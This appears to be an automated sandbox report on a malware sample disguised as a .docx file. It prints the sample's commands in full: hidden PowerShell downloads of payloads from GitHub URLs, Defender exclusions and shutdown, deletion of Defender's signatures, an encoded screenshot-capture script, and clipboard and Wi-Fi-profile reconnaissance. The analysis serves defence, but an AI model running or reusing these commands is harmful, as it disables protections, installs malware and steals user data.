Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE43028 IsProcessorFeaturePresent,00007FFE0E141730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE0E141730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00007FFDEAE43028
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41CB7 SetUnhandledExceptionFilter,	17_2_00007FFDF6A41CB7
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A4212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00007FFDF6A4212B
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6ABDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FFDF6ABDFFC

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\calc.exe calc.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgA